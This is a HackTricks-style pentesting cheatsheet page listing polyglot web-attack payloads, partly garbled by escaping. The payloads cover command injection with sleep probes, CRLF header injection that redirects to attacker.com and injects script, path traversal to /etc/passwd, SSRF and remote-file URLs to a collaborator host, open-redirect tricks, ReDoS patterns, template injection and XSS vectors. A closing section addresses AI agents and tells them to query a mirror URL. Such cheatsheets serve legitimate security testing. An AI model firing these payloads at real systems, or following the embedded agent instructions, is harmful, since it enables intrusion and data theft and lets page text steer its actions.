# Web Vulns List

## Web Vulns List

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>

* 您在**网络安全公司**工作吗？想要看到您的**公司在HackTricks中宣传**吗？或者想要访问**PEASS的最新版本或下载HackTricks的PDF**吗？查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS & HackTricks周边**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks)**和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**提交PR来分享您的黑客技巧**。

</details>

\`\`\`python {{7\*7}}\[7\*7] 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /\*$(sleep 5)\`sleep 5\`\`\*/-sleep(5)-'/\*$(sleep 5)\`sleep 5\` #\*/-sleep(5)||'"||sleep(5)||"/\*\`\*/ %0d%0aLocation:%20<http://attacker.com> %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E\\

## THIS IS AND INJECTED TITLE

/etc/passwd ../../../../../../etc/hosts ..\\..\\..\\..\\..\\..\etc/hosts /etc/hostname ../../../../../../etc/hosts C:/windows/system32/drivers/etc/hosts ../../../../../../windows/system32/drivers/etc/hosts ..\\..\\..\\..\\..\\..\windows/system32/drivers/etc/hosts <http://asdasdasdasd.burpcollab.com/mal.php> \\\asdasdasdasd.burpcollab.com/mal.php [www.whitelisted.com](http://www.whitelisted.com) [www.whitelisted.com.evil.com](http://www.whitelisted.com.evil.com) <https://google.com> //google.com javascript:alert(1) (\\\w\*)+$ (\[a-zA-Z]+)\*$ ((a+)+)+$ x=>alert(/Chrome%20XSS%20filter%20bypass/);> {{7\*7}}${7\*7}<%= 7\*7 %>${{7\*7}}#{7\*7}${{<%\[%'"}}%\ " onclick=alert() a=" '">![](https://github.com/carlospolop/hacktricks/blob/cn/pentesting-web/pocs-and-polygloths-cheatsheet/x) javascript:alert() javascript:"/\*'/\*\`/\*--> -->'"/>

">>![](https://github.com/carlospolop/hacktricks/blob/cn/pentesting-web/pocs-and-polygloths-cheatsheet/x)" >\<script>prompt(1)\</script>@gmail.com\<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" >\</script>\<script>alert(1)\</script>">\<img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">\<img src="http: //i.imgur.com/P8mL8.jpg">\
" onclick=alert(1)//\<button ‘ onclick=alert(1)//> \*/ alert(1)//\
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >\</SCRIPT>">'>\<SCRIPT>alert(String.fromCharCode(88,83,83)) \</SCRIPT>\
\`\`\`\
\<details>**从零开始学习AWS黑客技术，成为专家** [**htARTE（HackTricks AWS红队专家）**](https://training.hacktricks.xyz/courses/arte)**！**

* 你在**网络安全公司**工作吗？想要看到你的**公司在HackTricks上做广告**吗？或者想要获取**PEASS的最新版本或下载HackTricks的PDF**吗？查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* 获取[**官方PEASS和HackTricks周边**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks)**和**[**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud)**提交PR来分享你的黑客技巧**。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacktricks.xsx.tw/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.